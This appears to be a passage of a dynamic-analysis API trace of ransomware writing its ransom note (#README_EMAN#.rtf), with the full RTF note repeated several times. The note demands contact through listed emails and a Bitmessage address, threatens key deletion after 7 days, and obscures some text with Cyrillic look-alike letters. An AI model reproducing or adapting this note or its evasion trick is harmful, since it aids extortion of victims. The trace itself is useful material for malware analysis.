;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.820] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.820] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.828] CloseHandle (hObject=0x27c) returned 1 [0298.828] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\#readme_eman#.rtf")) returned 0xffffffff [0298.829] GetLastError () returned 0x2 [0298.829] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ko\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ko\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.829] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b 